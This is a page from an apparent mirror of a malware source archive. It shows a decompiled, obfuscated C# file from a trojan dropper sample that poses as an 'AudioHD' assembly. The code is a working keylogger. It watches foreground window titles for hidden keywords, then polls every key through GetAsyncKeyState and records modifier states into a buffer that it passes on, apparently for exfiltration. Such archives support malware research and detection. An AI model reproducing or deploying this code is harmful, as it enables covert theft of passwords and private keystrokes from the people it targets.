ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0007.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

275 lines
14 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u000E;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Timers;
using System.Windows.Forms;
namespace \u0007
{
internal sealed class \u0007
{
[NonSerialized]
internal static \u0002 \u0001;
private static \u0008 \u0001;
private static string \u0001;
private static string \u0002;
private static System.Timers.Timer \u0001;
private static string \u0003;
private static string \u0004;
private static bool \u0001;
private static bool \u0002;
private static bool \u0003;
[DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
private static extern short \u000F([In] Keys obj0);
[DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
private static extern short \u000F([In] int obj0);
[DllImport("User32.dll", EntryPoint = "GetWindowText")]
public static extern int \u000F([In] int obj0, [In] StringBuilder obj1, [In] int obj2);
[DllImport("User32.dll", EntryPoint = "GetForegroundWindow")]
public static extern int \u000F();
public static void \u000F()
{
\u0007.\u0007.\u0003 = \u0007.\u0007.\u000F();
\u0007.\u0007.\u0004 = \u0007.\u0007.\u0003;
\u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
\u0007.\u0007.\u0001 = new System.Timers.Timer();
\u0007.\u0007.\u0001.Elapsed += new ElapsedEventHandler(\u0007.\u0007.\u000F);
\u0007.\u0007.\u0001.Interval = 10.0;
\u0007.\u0007.\u0001.Enabled = false;
while (true)
{
string upper = \u0007.\u0007.\u000F().ToUpper();
if (upper.Contains(\u0007.\u0007.\u0001(865)) || upper.Contains(\u0007.\u0007.\u0001(874)) || upper.Contains(\u0007.\u0007.\u0001(891)) || upper.Contains(\u0007.\u0007.\u0001(904)) || upper.Contains(\u0007.\u0007.\u0001(917)) || upper.Contains(\u0007.\u0007.\u0001(926)) || upper.Contains(\u0007.\u0007.\u0001(935)) || upper.Contains(\u0007.\u0007.\u0001(948)) || upper.Contains(\u0007.\u0007.\u0001(965)) || upper.Contains(\u0007.\u0007.\u0001(978)) || upper.Contains(\u0007.\u0007.\u0001(999)) || upper.Contains(\u0007.\u0007.\u0001(1016)) || upper.Contains(\u0007.\u0007.\u0001(1033)) || upper.Contains(\u0007.\u0007.\u0001(1050)))
{
\u0007.\u0007.\u0001.Start();
if (\u0007.\u0007.\u0002 == \u0007.\u0007.\u0001(864))
\u0007.\u0007.\u0002 = upper;
}
else if (\u0007.\u0007.\u0001 != \u0007.\u0007.\u0001(864))
{
\u0007.\u0007.\u0001.Stop();
\u0007.\u0007.\u0001.\u000F(\u0007.\u0007.\u0002, \u0007.\u0007.\u0001);
\u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
}
Thread.Sleep(1000);
}
}
public static string \u000F()
{
int num1 = \u0007.\u0007.\u000F();
StringBuilder stringBuilder = new StringBuilder(1024);
int num2 = \u0007.\u0007.\u000F(num1, stringBuilder, stringBuilder.Capacity);
return num2 <= 0 || num2 > stringBuilder.Length ? \u0007.\u0007.\u0001(1071) : stringBuilder.ToString();
}
private static void \u000F([In] object obj0, [In] ElapsedEventArgs obj1)
{
foreach (int num in Enum.GetValues(typeof (Keys)))
{
if (\u0007.\u0007.\u000F(num) == (short) -32767)
{
if (\u0007.\u0007.\u000F())
{
if (!\u0007.\u0007.\u0002)
{
\u0007.\u0007.\u0002 = true;
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1084);
}
}
else if (\u0007.\u0007.\u0002)
{
\u0007.\u0007.\u0002 = false;
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1097);
}
if (\u0007.\u0007.\u0012())
{
if (!\u0007.\u0007.\u0001)
{
\u0007.\u0007.\u0001 = true;
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1114);
}
}
else if (\u0007.\u0007.\u0001)
{
\u0007.\u0007.\u0001 = false;
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1127);
}
if (\u0007.\u0007.\u0011())
{
if (!\u0007.\u0007.\u0003)
{
\u0007.\u0007.\u0003 = true;
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1140);
}
}
else if (\u0007.\u0007.\u0003)
{
\u0007.\u0007.\u0003 = false;
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1161);
}
if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1182))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1195);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1208))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1221);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1234))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1243);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1260))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1269);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1274))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1283);
else if (!(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1296)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1330)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1347)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1360)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1373)))
{
if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1386))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1395);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1404))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1413);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1422))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1431);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1440))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1445);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1454))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1459);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1468))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1477);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1490))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1503);
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1520) || Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1529))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1538);
}
else
continue;
if (\u0007.\u0007.\u0010())
{
if (num >= 65 && num <= 122)
\u0007.\u0007.\u0001 += (string) (object) (char) num;
else if (num.ToString() == \u0007.\u0007.\u0001(1547))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1552);
else if (num.ToString() == \u0007.\u0007.\u0001(1557))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1562);
else if (num.ToString() == \u0007.\u0007.\u0001(1567))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1572);
else if (num.ToString() == \u0007.\u0007.\u0001(1577))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1582);
else if (num.ToString() == \u0007.\u0007.\u0001(1587))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1592);
else if (num.ToString() == \u0007.\u0007.\u0001(1597))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1602);
else if (num.ToString() == \u0007.\u0007.\u0001(1607))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1612);
else if (num.ToString() == \u0007.\u0007.\u0001(1617))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1622);
else if (num.ToString() == \u0007.\u0007.\u0001(1627))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1632);
else if (num.ToString() == \u0007.\u0007.\u0001(1637))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1642);
else if (num.ToString() == \u0007.\u0007.\u0001(1647))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1652);
else if (num.ToString() == \u0007.\u0007.\u0001(1657))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1662);
else if (num.ToString() == \u0007.\u0007.\u0001(1667))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1672);
else if (num.ToString() == \u0007.\u0007.\u0001(1677))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1682);
else if (num.ToString() == \u0007.\u0007.\u0001(1687))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1692);
else if (num.ToString() == \u0007.\u0007.\u0001(1697))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1702);
else if (num.ToString() == \u0007.\u0007.\u0001(1707))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1712);
else if (num.ToString() == \u0007.\u0007.\u0001(1717))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1722);
else if (num.ToString() == \u0007.\u0007.\u0001(1727))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1732);
else if (num.ToString() == \u0007.\u0007.\u0001(1737))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1742);
else if (num.ToString() == \u0007.\u0007.\u0001(1747))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1752);
}
else if (num >= 65 && num <= 122)
\u0007.\u0007.\u0001 += (string) (object) (char) (num + 32);
else if (num.ToString() == \u0007.\u0007.\u0001(1547))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1757);
else if (num.ToString() == \u0007.\u0007.\u0001(1557))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1762);
else if (num.ToString() == \u0007.\u0007.\u0001(1567))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1767);
else if (num.ToString() == \u0007.\u0007.\u0001(1577))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1772);
else if (num.ToString() == \u0007.\u0007.\u0001(1587))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1777);
else if (num.ToString() == \u0007.\u0007.\u0001(1597))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1782);
else if (num.ToString() == \u0007.\u0007.\u0001(1607))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1787);
else if (num.ToString() == \u0007.\u0007.\u0001(1617))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1792);
else if (num.ToString() == \u0007.\u0007.\u0001(1627))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1797);
else if (num.ToString() == \u0007.\u0007.\u0001(1637))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1802);
else if (num.ToString() == \u0007.\u0007.\u0001(1657))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1807);
else if (num.ToString() == \u0007.\u0007.\u0001(1667))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1812);
else if (num.ToString() == \u0007.\u0007.\u0001(1817))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1822);
else if (num.ToString() == \u0007.\u0007.\u0001(1677))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1827);
else if (num.ToString() == \u0007.\u0007.\u0001(1687))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1832);
else if (num.ToString() == \u0007.\u0007.\u0001(1697))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1837);
else if (num.ToString() == \u0007.\u0007.\u0001(1707))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1842);
else if (num.ToString() == \u0007.\u0007.\u0001(1717))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1847);
else if (num.ToString() == \u0007.\u0007.\u0001(1727))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1852);
else if (num.ToString() == \u0007.\u0007.\u0001(1737))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1857);
else if (num.ToString() == \u0007.\u0007.\u0001(1747))
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1862);
}
}
}
[SpecialName]
public static bool \u000F() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ControlKey) & 32768);
[SpecialName]
public static bool \u0010() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ShiftKey) & 32768);
[SpecialName]
public static bool \u0011() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Capital) & 32768);
[SpecialName]
public static bool \u0012() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Menu) & 32768);
static \u0007()
{
\u0003.\u000F();
\u0007.\u0007.\u0001 = new \u0008();
\u0007.\u0007.\u0002 = \u0007.\u0007.\u0001(864);
\u0007.\u0007.\u0001 = false;
\u0007.\u0007.\u0002 = false;
\u0007.\u0007.\u0003 = false;
}
}
}
Reference in New Issue View Git Blame Copy Permalink